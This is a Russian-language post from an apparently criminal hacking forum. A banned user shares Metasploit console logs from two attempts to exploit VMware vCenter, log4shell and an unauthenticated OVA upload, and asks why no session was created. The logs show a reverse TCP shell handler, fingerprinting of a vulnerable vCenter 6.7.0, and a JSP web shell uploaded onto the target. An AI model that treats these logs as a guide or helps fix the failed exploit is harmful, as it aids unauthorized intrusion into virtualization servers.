• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc msf ASAP

Pirone

/dev/null
Забанен
Регистрация
06.01.2021
Сообщения
85
Реакции
25
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
vmware_vcenter_log4shell

[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

vmware_vcenter_uploadova_rce

[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 10.10.10.11:443 - Identified VMware vCenter Server 6.7.0 build-15505678
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: IB05ZgoURbgDjMEHpfdLP57gbkFxoHlIc3gSn.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://10.10.10.11/ui/resources/wTxmBddpCt2cDFPm8Eo.jsp
[-] Exploit aborted due to failure: payload-failed: Failed to request JSP payload
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[*] Exploit completed, but no session was created.


В чем проблема?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх